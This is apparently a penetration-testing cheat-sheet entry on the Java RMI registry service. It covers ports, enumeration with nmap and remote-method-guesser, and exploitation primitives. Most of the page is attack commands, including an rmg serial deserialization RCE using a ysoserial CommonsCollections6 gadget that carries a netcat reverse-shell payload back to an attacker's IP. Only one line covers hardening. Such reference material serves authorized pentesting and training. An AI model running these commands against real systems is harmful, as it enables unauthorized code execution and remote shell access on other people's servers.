Java RMI
aka rmi, rmiregistry
Java Remote Method Invocation registry on 1099 (and random high ports). Enumerate bound objects, then exploit insecure remote methods or deserialization for RCE — remote-method-guesser is the modern Swiss-army tool.
Ports
| Port | Proto | Notes |
|---|---|---|
1099 | tcp | RMI registry |
1098 | tcp | RMI activation |
Fingerprint
- nmap rmi-dumpregistry lists bound objects
- remote-method-guesser (rmg) enum returns registry + objects
Exploitation primitives
- Enumerate bound objects and their interfaces (rmg enum / nmap rmi-dumpregistry)
- Call dangerous remote methods directly; guess method signatures with rmg guess
- Deserialization RCE via the registry or a vulnerable remote method (ysoserial gadget)
Overview
Java RMI on 1099 lets clients call methods on remote Java objects. Insecure endpoints expose dangerous methods or accept arbitrary serialized objects — both lead to RCE.
Enumeration
Dump the registry (bound objects):
nmap -p1099 --script rmi-dumpregistry <TARGET>Full enum with remote-method-guesser:
rmg enum <TARGET> 1099Exploit
Guess remote method signatures:
rmg guess <TARGET> 1099Deserialization RCE against the registry (ysoserial gadget):
rmg serial <TARGET> 1099 CommonsCollections6 "nc <YOUR_IP> 4444 -e /bin/bash" --component regHardening
Enable a security manager + deserialization filters, require TLS/auth, and don’t expose the registry to untrusted networks.